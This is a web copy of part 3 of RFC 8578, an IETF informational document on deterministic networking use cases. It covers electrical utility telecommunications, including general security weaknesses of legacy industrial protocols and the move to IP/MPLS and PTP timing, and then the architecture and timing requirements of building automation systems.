Tech-invite3GPPspaceIETFspace
959493929190898887868584838281807978777675747372717069686766656463626160595857565554535251504948474645444342414039383736353433323130292827262524232221201918171615141312111009080706050403020100
in Index   Prev   Next

RFC 8578

Deterministic Networking Use Cases

Pages: 97
Informational
Part 3 of 8 – Pages 33 to 47
First   Prev   Next

Top   ToC   RFC8578 - Page 33   prevText

3.2. Electrical Utilities Today

Many utilities still rely on complex environments consisting of multiple application-specific proprietary networks, including TDM networks. In this kind of environment, there is no mixing of Operation Technology (OT) and IT applications on the same network, and information is siloed between operational areas. Specific calibration of the full chain is required; this is costly. This kind of environment prevents utility operations from realizing operational efficiency benefits, visibility, and functional integration of operational information across grid applications and data networks.
Top   ToC   RFC8578 - Page 34
   In addition, there are many security-related issues, as discussed in
   the following section.

3.2.1. Current Security Practices and Their Limitations

Grid-monitoring and control devices are already targets for cyber attacks, and legacy telecommunications protocols have many intrinsic network-related vulnerabilities. For example, the Distributed Network Protocol (DNP3) [IEEE-1815], Modbus, PROFIBUS/PROFINET, and other protocols are designed around a common paradigm of "request and respond". Each protocol is designed for a master device such as an HMI (Human-Machine Interface) system to send commands to subordinate slave devices to perform data retrieval (reading inputs) or control functions (writing to outputs). Because many of these protocols lack authentication, encryption, or other basic security measures, they are prone to network-based attacks, allowing a malicious actor or attacker to utilize the request-and-respond system as a mechanism for functionality similar to command and control. Specific security concerns common to most industrial-control protocols (including utility telecommunications protocols) include the following: o Network or transport errors (e.g., malformed packets or excessive latency) can cause protocol failure. o Protocol commands may be available that are capable of forcing slave devices into inoperable states, including powering devices off, forcing them into a listen-only state, or disabling alarming. o Protocol commands may be available that are capable of interrupting processes (e.g., restarting communications). o Protocol commands may be available that are capable of clearing, erasing, or resetting diagnostic information such as counters and diagnostic registers. o Protocol commands may be available that are capable of requesting sensitive information about the controllers, their configurations, or other need-to-know information. o Most protocols are application-layer protocols transported over TCP; it is therefore easy to transport commands over non-standard ports or inject commands into authorized traffic flows. o Protocol commands may be available that are capable of broadcasting messages to many devices at once (i.e., a potential DoS).
Top   ToC   RFC8578 - Page 35
   o  Protocol commands may be available that will query the device
      network to obtain defined points and their values (i.e., perform a
      configuration scan).

   o  Protocol commands may be available that will list all available
      function codes (i.e., perform a function scan).

   These inherent vulnerabilities, along with increasing connectivity
   between IT and OT networks, make network-based attacks very feasible.
   By injecting malicious protocol commands, an attacker could take
   control over the target process.  Altering legitimate protocol
   traffic can also alter information about a process and disrupt the
   legitimate controls that are in place over that process.  A
   man-in-the-middle attack could result in (1) improper control over a
   process and (2) misrepresentation of data that is sent back to
   operator consoles.

3.3. Electrical Utilities in the Future

The business and technology trends that are sweeping the utility industry will drastically transform the utility business from the way it has been for many decades. At the core of many of these changes is a drive to modernize the electrical grid with an integrated telecommunications infrastructure. However, interoperability concerns, legacy networks, disparate tools, and stringent security requirements all add complexity to the grid's transformation. Given the range and diversity of the requirements that should be addressed by the next-generation telecommunications infrastructure, utilities need to adopt a holistic architectural approach to integrate the electrical grid with digital telecommunications across the entire power delivery chain. The key to modernizing grid telecommunications is to provide a common, adaptable, multi-service network infrastructure for the entire utility organization. Such a network serves as the platform for current capabilities while enabling future expansion of the network to accommodate new applications and services. To meet this diverse set of requirements both today and in the future, the next-generation utility telecommunications network will be based on an open-standards-based IP architecture. An end-to-end IP architecture takes advantage of nearly three decades of IP technology development, facilitating interoperability and device management across disparate networks and devices, as has already been demonstrated in many mission-critical and highly secure networks.
Top   ToC   RFC8578 - Page 36
   IPv6 is seen as a future telecommunications technology for the smart
   grid; the IEC and different national committees have mandated a
   specific ad hoc group (AHG8) to define the strategy for migration to
   IPv6 for all the IEC Technical Committee 57 (TC 57) power automation
   standards.  The AHG8 has finalized its work on the migration
   strategy, and IEC TR 62357-200:2015 [IEC-62357-200:2015] has been
   issued.

   Cloud-based SCADA systems will control and monitor the critical and
   non-critical subsystems of generation systems -- for example, wind
   parks.

3.3.1. Migration to Packet-Switched Networks

Throughout the world, utilities are increasingly planning for a future based on smart-grid applications requiring advanced telecommunications systems. Many of these applications utilize packet connectivity for communicating information and control signals across the utility's WAN, made possible by technologies such as Multiprotocol Label Switching (MPLS). The data that traverses the utility WAN includes: o Grid monitoring, control, and protection data o Non-control grid data (e.g., asset data for condition monitoring) o Data (e.g., voice and video) related to physical safety and security o Remote worker access to corporate applications (voice, maps, schematics, etc.) o Field area network Backhaul for smart metering o Distribution-grid management o Enterprise traffic (email, collaboration tools, business applications) WANs support this wide variety of traffic to and from substations, the transmission and distribution grid, and generation sites; between control centers; and between work locations and data centers. To maintain this rapidly expanding set of applications, many utilities are taking steps to evolve present TDM-based and frame relay infrastructures to packet systems. Packet-based networks are designed to provide greater functionalities and higher levels of service for applications, while continuing to deliver reliability and deterministic (real-time) traffic support.
Top   ToC   RFC8578 - Page 37

3.3.2. Telecommunications Trends

These general telecommunications topics are provided in addition to the use cases that have been addressed so far. These include both current and future telecommunications-related topics that should be factored into the network architecture and design.
3.3.2.1. General Telecommunications Requirements
o IP connectivity everywhere o Monitoring services everywhere, and from different remote centers o Moving services to a virtual data center o Unified access to applications/information from the corporate network o Unified services o Unified communications solutions o Mix of fiber and microwave technologies - obsolescence of the Synchronous Optical Network / Synchronous Digital Hierarchy (SONET/SDH) or TDM o Standardizing grid telecommunications protocols to open standards, to ensure interoperability o Reliable telecommunications for transmission and distribution substations o IEEE 1588 time-synchronization client/server capabilities o Integration of multicast design o Mapping of QoS requirements o Enabling future network expansion o Substation network resilience o Fast convergence design o Scalable headend design o Defining SLAs and enabling SLA monitoring
Top   ToC   RFC8578 - Page 38
   o  Integration of 3G/4G technologies and future technologies

   o  Ethernet connectivity for station bus architecture

   o  Ethernet connectivity for process bus architecture

   o  Protection, teleprotection, and PMUs on IP

3.3.2.2. Specific Network Topologies of Smart-Grid Applications
Utilities often have very large private telecommunications networks that can cover an entire territory/country. Until now, the main purposes of these networks have been to (1) support transmission network monitoring, control, and automation, (2) support remote control of generation sites, and (3) provide FCAPS (Fault, Configuration, Accounting, Performance, and Security) services from centralized network operation centers. Going forward, one network will support the operation and maintenance of electrical networks (generation, transmission, and distribution), voice and data services for tens of thousands of employees and for exchanges with neighboring interconnections, and administrative services. To meet those requirements, a utility may deploy several physical networks leveraging different technologies across the country -- for instance, an optical network and a microwave network. Each protection and automation system between two points has two telecommunications circuits, one on each network. Path diversity between two substations is key. Regardless of the event type (hurricane, ice storm, etc.), one path needs to stay available so the system can still operate. In the optical network, signals are transmitted over more than tens of thousands of circuits using fiber optic links, microwave links, and telephone cables. This network is the nervous system of the utility's power transmission operations. The optical network represents tens of thousands of kilometers of cable deployed along the power lines, with individual runs as long as 280 km.
3.3.2.3. Precision Time Protocol
Some utilities do not use GPS clocks in generation substations. One of the main reasons is that some of the generation plants are 30 to 50 meters deep underground and the GPS signal can be weak and unreliable. Instead, atomic clocks are used. Clocks are synchronized amongst each other. Rubidium clocks provide clock and 1 ms timestamps for IRIG-B.
Top   ToC   RFC8578 - Page 39
   Some companies plan to transition to PTP [IEEE-1588], distributing
   the synchronization signal over the IP/MPLS network.  PTP provides a
   mechanism for synchronizing the clocks of participating nodes to a
   high degree of accuracy and precision.

   PTP operates based on the following assumptions:

   o  The network eliminates cyclic forwarding of PTP messages within
      each communication path (e.g., by using a spanning tree protocol).

   o  PTP is tolerant of an occasional missed message, duplicated
      message, or message that arrived out of order.  However, PTP
      assumes that such impairments are relatively rare.

   o  As designed, PTP expects a multicast communication model; however,
      PTP also supports a unicast communication model as long as the
      behavior of the protocol is preserved.

   o  Like all message-based time transfer protocols, PTP time accuracy
      is degraded by delay asymmetry in the paths taken by event
      messages.  PTP cannot detect asymmetry, but if such delays are
      known a priori, time values can be adjusted to correct for
      asymmetry.

   The use of PTP for power automation is defined in
   IEC/IEEE 61850-9-3:2016 [IEC-IEEE-61850-9-3:2016].  It is based on
   Annex B of IEC 62439-3:2016 [IEC-62439-3:2016], which offers the
   support of redundant attachment of clocks to Parallel Redundancy
   Protocol (PRP) and High-availability Seamless Redundancy (HSR)
   networks.

3.3.3. Security Trends in Utility Networks

Although advanced telecommunications networks can assist in transforming the energy industry by playing a critical role in maintaining high levels of reliability, performance, and manageability, they also introduce the need for an integrated security infrastructure. Many of the technologies being deployed to support smart-grid projects such as smart meters and sensors can increase the vulnerability of the grid to attack. Top security concerns for utilities migrating to an intelligent smart-grid telecommunications platform center on the following trends: o Integration of distributed energy resources o Proliferation of digital devices to enable management, automation, protection, and control
Top   ToC   RFC8578 - Page 40
   o  Regulatory mandates to comply with standards for critical
      infrastructure protection

   o  Migration to new systems for outage management, distribution
      automation, condition-based maintenance, load forecasting, and
      smart metering

   o  Demand for new levels of customer service and energy management

   This development of a diverse set of networks to support the
   integration of microgrids, open-access energy competition, and the
   use of network-controlled devices is driving the need for a converged
   security infrastructure for all participants in the smart grid,
   including utilities, energy service providers, large commercial and
   industrial customers, and residential customers.  Securing the assets
   of electric power delivery systems (from the control center to the
   substation, to the feeders and down to customer meters) requires an
   end-to-end security infrastructure that protects the myriad of
   telecommunications assets used to operate, monitor, and control power
   flow and measurement.

   "Cybersecurity" refers to all the security issues in automation and
   telecommunications that affect any functions related to the operation
   of the electric power systems.  Specifically, it involves the
   concepts of:

   o  Integrity: data cannot be altered undetectably

   o  Authenticity (data origin authentication): the telecommunications
      parties involved must be validated as genuine

   o  Authorization: only requests and commands from authorized users
      can be accepted by the system

   o  Confidentiality: data must not be accessible to any
      unauthenticated users

   When designing and deploying new smart-grid devices and
   telecommunications systems, it is imperative to understand the
   various impacts of these new components under a variety of attack
   situations on the power grid.  The consequences of a cyber attack on
   the grid telecommunications network can be catastrophic.  This is why
   security for the smart grid is not just an ad hoc feature or product;
   it's a complete framework integrating both physical and cybersecurity
   requirements and covering the entire smart-grid networks from
   generation to distribution.  Security has therefore become one of the
   main foundations of the utility telecom network architecture and must
   be considered at every layer with a defense-in-depth approach.
Top   ToC   RFC8578 - Page 41
   Migrating to IP-based protocols is key to addressing these challenges
   for two reasons:

   o  IP enables a rich set of features and capabilities to enhance the
      security posture.

   o  IP is based on open standards; this allows interoperability
      between different vendors and products, driving down the costs
      associated with implementing security solutions in OT networks.

   Securing OT telecommunications over packet-switched IP networks
   follows the same principles that are foundational for securing the IT
   infrastructure, i.e., consideration must be given to (1) enforcing
   electronic access control for both person-to-machine and machine-to-
   machine communications and (2) providing the appropriate levels of
   data privacy, device and platform integrity, and threat detection and
   mitigation.

3.4. Electrical Utilities Requests to the IETF

o Mixed Layer 2 and Layer 3 topologies o Deterministic behavior o Bounded latency and jitter o Tight feedback intervals o High availability, low recovery time o Redundancy, low packet loss o Precise timing o Centralized computing of deterministic paths o Distributed configuration (may also be useful)

4. Building Automation Systems (BASs)

4.1. Use Case Description

A BAS manages equipment and sensors in a building for improving residents' comfort, reducing energy consumption, and responding to failures and emergencies. For example, the BAS measures the temperature of a room using sensors and then controls the HVAC (heating, ventilating, and air conditioning) to maintain a set temperature and minimize energy consumption.
Top   ToC   RFC8578 - Page 42
   A BAS primarily performs the following functions:

   o  Periodically measures states of devices -- for example, humidity
      and illuminance of rooms, open/close state of doors, fan speed.

   o  Stores the measured data.

   o  Provides the measured data to BAS operators.

   o  Generates alarms for abnormal state of devices.

   o  Controls devices (e.g., turns room lights off at 10:00 PM).

4.2. BASs Today

4.2.1. BAS Architecture

A typical present-day BAS architecture is shown in Figure 4. +----------------------------+ | | | BMS HMI | | | | | | +----------------------+ | | | Management Network | | | +----------------------+ | | | | | | LC LC | | | | | | +----------------------+ | | | Field Network | | | +----------------------+ | | | | | | | | Dev Dev Dev Dev | | | +----------------------------+ BMS: Building Management Server HMI: Human-Machine Interface LC: Local Controller Figure 4: BAS Architecture There are typically two layers of a network in a BAS. The upper layer is called the management network, and the lower layer is called the field network. In management networks, an IP-based communication protocol is used, while in field networks, non-IP-based communication
Top   ToC   RFC8578 - Page 43
   protocols ("field protocols") are mainly used.  Field networks have
   specific timing requirements, whereas management networks can be best
   effort.

   An HMI is typically a desktop PC used by operators to monitor and
   display device states, send device control commands to Local
   Controllers (LCs), and configure building schedules (for example,
   "turn off all room lights in the building at 10:00 PM").

   A building management server (BMS) performs the following operations.

   o  Collects and stores device states from LCs at regular intervals.

   o  Sends control values to LCs according to a building schedule.

   o  Sends an alarm signal to operators if it detects abnormal device
      states.

   The BMS and HMI communicate with LCs via IP-based "management
   protocols" (see standards [BACnet-IP] and [KNX]).

   An LC is typically a Programmable Logic Controller (PLC) that is
   connected to several tens or hundreds of devices using "field
   protocols".  An LC performs the following kinds of operations:

   o  Measures device states and provides the information to a BMS
      or HMI.

   o  Sends control values to devices, unilaterally or as part of a
      feedback control loop.

   At the time of this writing, many field protocols are in use; some
   are standards-based protocols, and others are proprietary (see
   standards [LonTalk], [MODBUS], [PROFIBUS], and [FL-net]).  The result
   is that BASs have multiple MAC/PHY modules and interfaces.  This
   makes BASs more expensive and slower to develop and can result in
   "vendor lock-in" with multiple types of management applications.
Top   ToC   RFC8578 - Page 44

4.2.2. BAS Deployment Model

An example BAS for medium or large buildings is shown in Figure 5. The physical layout spans multiple floors and includes a monitoring room where the BAS management entities are located. Each floor will have one or more LCs, depending on the number of devices connected to the field network. +--------------------------------------------------+ | Floor 3 | | +----LC~~~~+~~~~~+~~~~~+ | | | | | | | | | Dev Dev Dev | | | | |--- | ------------------------------------------| | | Floor 2 | | +----LC~~~~+~~~~~+~~~~~+ Field Network | | | | | | | | | Dev Dev Dev | | | | |--- | ------------------------------------------| | | Floor 1 | | +----LC~~~~+~~~~~+~~~~~+ +-----------------| | | | | | | Monitoring Room | | | Dev Dev Dev | | | | | BMS HMI | | | Management Network | | | | | +--------------------------------+-----+ | | | | +--------------------------------------------------+ Figure 5: BAS Deployment Model for Medium/Large Buildings Each LC is connected to the monitoring room via the management network, and the management functions are performed within the building. In most cases, Fast Ethernet (e.g., 100BASE-T) is used for the management network. Since the management network is not a real-time network, the use of Ethernet without QoS is sufficient for today's deployments. Many physical interfaces used in field networks have specific timing requirements -- for example, RS232C and RS485. Thus, if a field network is to be replaced with an Ethernet or wireless network, such networks must support time-critical deterministic flows.
Top   ToC   RFC8578 - Page 45
   Figure 6 shows another deployment model, in which the management
   system is hosted remotely.  This model is becoming popular for small
   offices and residential buildings, in which a standalone monitoring
   system is not cost effective.

                                                     +---------------+
                                                     | Remote Center |
                                                     |               |
                                                     |  BMS     HMI  |
            +------------------------------------+   |   |       |   |
            |                            Floor 2 |   |   +---+---+   |
            |    +----LC~~~~+~~~~~+ Field Network|   |       |       |
            |    |          |     |              |   |     Router    |
            |    |         Dev   Dev             |   +-------|-------+
            |    |                               |           |
            |--- | ------------------------------|           |
            |    |                       Floor 1 |           |
            |    +----LC~~~~+~~~~~+              |           |
            |    |          |     |              |           |
            |    |         Dev   Dev             |           |
            |    |                               |           |
            |    |   Management Network          |     WAN   |
            |    +------------------------Router-------------+
            |                                    |
            +------------------------------------+

              Figure 6: Deployment Model for Small Buildings

   Some interoperability is possible in today's management networks but
   is not possible in today's field networks due to their non-IP-based
   design.

4.2.3. Use Cases for Field Networks

Below are use cases for environmental monitoring, fire detection, and feedback control, and their implications for field network performance.
4.2.3.1. Environmental Monitoring
The BMS polls each LC at a maximum measurement interval of 100 ms (for example, to draw a historical chart of 1-second granularity with a 10x sampling interval) and then performs the operations as specified by the operator. Each LC needs to measure each of its several hundred sensors once per measurement interval. Latency is not critical in this scenario as long as all sensor value measurements are completed within the measurement interval. Availability is expected to be 99.999%.
Top   ToC   RFC8578 - Page 46
4.2.3.2. Fire Detection
On detection of a fire, the BMS must stop the HVAC, close the fire shutters, turn on the fire sprinklers, send an alarm, etc. There are typically tens of fire sensors per LC that the BMS needs to manage. In this scenario, the measurement interval is 10-50 ms, the communication delay is 10 ms, and the availability must be 99.9999%.
4.2.3.3. Feedback Control
BASs utilize feedback control in various ways; the most time-critical is control of DC motors, which require a short feedback interval (1-5 ms) with low communication delay (10 ms) and jitter (1 ms). The feedback interval depends on the characteristics of the device and on the requirements for the control values. There are typically tens of feedback sensors per LC. Communication delay is expected to be less than 10 ms and jitter less than 1 ms, while the availability must be 99.9999%.

4.2.4. BAS Security Considerations

When BAS field networks were developed, it was assumed that the field networks would always be physically isolated from external networks; therefore, security was not a concern. In today's world, many BASs are managed remotely and are thus connected to shared IP networks; therefore, security is a definite concern. Note, however, that security features are not currently available in the majority of BAS field network deployments. The management network, being an IP-based network, has the protocols available to enable network security, but in practice many BASs do not implement even such available security features as device authentication or encryption for data in transit.

4.3. BASs in the Future

In the future, lower energy consumption and environmental monitoring that is more fine-grained will emerge; these will require more sensors and devices, thus requiring larger and more-complex building networks. Building networks will be connected to or converged with other networks (enterprise networks, home networks, and the Internet). Therefore, better facilities for network management, control, reliability, and security are critical in order to improve resident and operator convenience and comfort. For example, the ability to
Top   ToC   RFC8578 - Page 47
   monitor and control building devices via the Internet would enable
   (for example) control of room lights or HVAC from a resident's
   desktop PC or phone application.

4.4. BAS Requests to the IETF

The community would like to see an interoperable protocol specification that can satisfy the timing, security, availability, and QoS constraints described above, such that the resulting converged network can replace the disparate field networks. Ideally, this connectivity could extend to the open Internet. This would imply an architecture that can guarantee o Low communication delays (from <10 ms to 100 ms in a network of several hundred devices) o Low jitter (<1 ms) o Tight feedback intervals (1-10 ms) o High network availability (up to 99.9999%) o Availability of network data in disaster scenarios o Authentication between management devices and field devices (both local and remote) o Integrity and data origin authentication of communication data between management devices and field devices o Confidentiality of data when communicated to a remote device


(page 47 continued on part 4)

Next Section